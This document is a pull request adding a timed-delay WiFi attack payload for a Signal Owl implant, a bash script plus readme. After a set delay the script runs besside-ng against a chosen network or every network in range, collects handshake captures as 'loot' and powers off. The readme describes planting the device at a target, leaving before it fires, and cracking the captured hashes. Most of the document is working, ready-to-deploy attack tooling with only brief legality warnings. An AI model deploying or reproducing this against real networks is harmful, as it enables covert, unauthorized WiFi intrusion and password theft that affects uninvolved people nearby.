### PR TITLE
Payload fo Signal Owl to delay a WiFi attack

### DIFF
--- a/payloads/library/wifi/Delayed-AP-Attack-Mine/payload.txt
+++ b/payloads/library/wifi/Delayed-AP-Attack-Mine/payload.txt
@@ -1,0 +1,62 @@
+#!/bin/bash
+# Title: Timed-AP-Attack
+# Description: Starts an aggressive AP attack after n seconds, stops after n seconds, and then shuts down
+# Author: Saint Crossbow
+# Version: 1.0
+
+# Careful since not nicest thing to do and aggressive.
+# Check your RoE and ensure you do not get collateral damange
+# -b  Attack a specific BSSID
+# -W  Attack only WPA
+# -c  Lock on specific channel
+# Once complete, the capture files are in the /root/loot directory. Extract using:
+#   aircrack-ng -J filebase capturefile.cap
+# After that crack the hash using john or hashcat
+
+LED SETUP
+# Short fuse: starting in 5 minutes
+START_IN=300
+# Gather for 2 minutes
+GATHER_FOR=120
+# Leave blank if you want to attack all APs
+TARGET_BSSID=""
+
+echo "|_  Starting in $START_IN seconds, gathering for $GATHER_FOR seconds"
+if [ -z "$TARGET_BSSID" ]
+then
+  echo "|_  Attack all in range"
+else
+  echo "|_  Attack only $TARGET_BSSID"
+fi
+
+sleep $START_IN
+
+LED ATTACK
+
+echo "[*] Starting attack"
+
+if [ -z "$TARGET_BSSID" ]
+then
+  echo "[*] Attacking all APs in range..."
+  besside-ng wlan0 &
+  bpid=$!
+else
+  echo "[*] Attacking only $TARGET_BSSID..."
+  besside-ng -b $TARGET_BSSID wlan0 &
+  bpid=$!
+fi
+
+sleep $GATHER_FOR
+
+echo "[*] Stopping attack"
+kill $bpid
+wait $bpid
+
+mv /besside.log /root/loot
+mv /*.cap /root/loot
+sync
+
+LED SUCCESS
+
+echo "[*] Shutting down"
+poweroff

--- a/payloads/library/wifi/Delayed-AP-Attack-Mine/readme.md
+++ b/payloads/library/wifi/Delayed-AP-Attack-Mine/readme.md
@@ -1,0 +1,35 @@
+# Delayed AP Attack Mine
+### Set your fuse, make a quick getaway, and let your Signal Owl crack WiFi while everyone else is gone
+---
+Turn your Signal Owl into a powerful implant by using Besside-ng to attack networks. Besside-ng is an amazing application that aggressively attacks WiFi networks and obtains a hash for cracking offline. In the unlikely event WEP is found, it is cracked immediately. Your Signal Owl already has it installed - but this particular payload delays the attack so you don't have to present when it runs (or even better when no one is at the target area at all).
+
+An external WiFi adapter is required for this payload. The Hak5 RT5370 was tested and works perfectly.
+
+**WARNING: This program is very aggressive: ensure you are on sound legal ground and only run it if your rules of engagement allow such attacks. Research your target beforehand to ensure you do not have collateral damage.**
+
+*Setup*
+1. Boot into ARMING mode
+2. Copy the payload to /root/payload.txt
+3. Enable to run by:
+   `chmod +x payload.txt`
+4. Open the payload with nano
+5. Change the START_IN value to be length of your "delay fuse" in seconds - this is your time to make your exit, stage left
+6. Change the GATHER_FOR value to be the length you want besside-ng to run. Consider your target's level of attention accordingly
+7. Set the BSSID if you want to only attack a specific network
+8. Save, exit, and shutdown.
+
+The mine is ready for implant.
+
+*Deploy*
+1. Connect the WiFi adapter
+2. Place the Signal Owl at your target. Once booted and on it will stay steady red until the payload runs
+3. Set your watch and leave
+4. After the timer is up, besside-ng will run for the specified time during which the LED will flash slightly in ATTACK pattern.
+5. After the run, the Signal Owl will power off (LED will of couse be off as well).
+
+*Gather Loot*
+1. All loot is found in the /root/loot directory
+2. To extract hashes, use:
+   `aircrack-ng -J filebase capturefile.cap`
+3. Use your favorite password cracker to obtain the passphrase - YMMV based on passphrase difficulty. May I recommend byepass for ease of use?
+


### PR DESCRIPTION
A timed delay is set in the payload before besside-ng attacks a specific or all in-range network(s). After a customized time, besside-ng is stopped, the loot copied off, and the unit powered off. The design separates the planting of the device and the actual attack, to the point that the attack might occur when no one is paying attention. Naturally the product assumes legal usage under target's RoE.